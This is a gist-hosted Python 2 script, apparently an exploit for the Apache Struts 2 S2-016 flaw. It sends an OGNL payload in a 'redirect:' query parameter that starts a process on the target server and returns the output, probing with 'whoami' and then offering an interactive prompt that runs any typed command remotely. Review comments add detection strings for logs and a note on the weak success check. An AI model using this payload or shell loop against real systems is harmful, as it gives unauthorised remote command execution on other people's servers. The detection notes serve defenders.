
@wcc526
Last active February 28, 2017 04:57
s2_016.py
#!/usr/bin/env python
import urllib
import urllib2
import re
import sys
# Query-string suffix that judge() and the __main__ block append to the target URL.
# It passes an OGNL expression in a parameter whose name starts with "redirect:".
# As written, the expression starts a process ('whoami' by default), reads up to
# 50000 chars of its output and writes them to the HTTP response writer.
# NOTE(review): the file name (s2_016.py) suggests the Apache Struts 2 advisory
# S2-016 -- confirm against the vendor advisory before relying on that.
# Defender notes: in access, proxy or WAF logs this request is recognisable by a
# query string starting with "redirect:${" that contains "java.lang.ProcessBuilder",
# "com.opensymphony.xwork2.dispatcher.HttpServletResponse" and "%23" (URL-encoded
# '#'). Alert on those substrings, correlate hits with child processes spawned by
# the application server, and move the framework to a release the vendor
# advisory lists as fixed.
url_exp = "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
def judge(url):
    """Send one request for ``url + url_exp`` and classify the response body.

    Returns "Failed" when the body contains '>' at any index after the first
    character, "OK" when it does not, and "ERROR" when anything raises.

    NOTE(review): the "OK" result is a weak heuristic. Any response without
    '>' past index 0 (an empty body, a plain-text error page) is reported as
    "OK", so the result is not evidence of exposure or of patch status.
    """
    try:
        reply = urllib2.urlopen(urllib2.Request(url + url_exp))
        body = reply.read()
        # find() yields -1 when '>' is absent and 0 when it is the first
        # character; both cases fall through to "OK".
        has_markup = body.find(">") > 0
        return "Failed" if has_markup else "OK"
    except:
        # NOTE(review): the bare except hides the cause of the failure
        # (DNS, TLS, HTTP status) and also swallows KeyboardInterrupt.
        return "ERROR"
def get_args(argument):
    """Split *argument* on single spaces and return the pieces as a
    comma-separated list of single-quoted tokens.

    Consecutive spaces produce empty quoted tokens, and an empty input gives
    one empty quoted token. Quote characters inside a piece are not escaped.
    """
    quoted = ["'" + piece + "'" for piece in argument.split(' ')]
    return ",".join(quoted)
def strip(str):
    """Trim surrounding whitespace from *str*, then drop every NUL (0x00)
    character from the result.

    NUL characters are removed wherever they occur, not only at the ends.
    The padding presumably comes from the unused part of the 50000-char
    buffer that the payload prints -- TODO confirm.
    """
    trimmed = str.strip()
    return trimmed.replace('\x00', '')
def attack(url):
    """Request *url* and return the response body after whitespace trimming
    and NUL removal (via the module-level strip()), or "ERROR" on any
    exception.
    """
    try:
        raw_body = urllib2.urlopen(urllib2.Request(url)).read()
        return strip(raw_body.strip())
    except:
        # NOTE(review): the bare except makes every failure look the same
        # and also swallows KeyboardInterrupt.
        return "ERROR"
# Script entry point: takes the target URL as the first command-line argument.
# Python 2 only (print statements, raw_input).
# NOTE(review): the indentation of this listing was lost on the page, so the
# nesting of the statements below cannot be read from it. In particular,
# `loop=0` may sit directly after `break` inside the `if`, where it would be
# unreachable.
if __name__ == '__main__':
if len(sys.argv) > 1:
#print get_url("ls -al")
# Continue only when the probe in judge() returned "OK".
if judge(sys.argv[1]) == "OK":
print "Success"
# Capture the text between the scheme and the next '/' to label the prompt.
pattern = re.compile(r'http[s]?://([\w\W]*?)/')
url = sys.argv[1] + url_exp
hostname = pattern.findall(url)
#print hostname[0]
# NOTE(review): hostname[0] below raises IndexError when the argument has no
# '/' after the host part, because url_exp itself contains no '/'.
loop = 1
while loop:
string = raw_input(hostname[0] + " >")
# Any input that begins with "exit" ends the session.
if string.startswith("exit"):
break
loop=0
if len(string) > 0:
# Swap the default 'whoami' element of the payload for the quoted words typed
# at the prompt, then print the cleaned response body.
url_ = url.replace("'whoami'",get_args(string))
#print url_
print attack(url_)
else:
print "Failed"
else:
print("No argument!")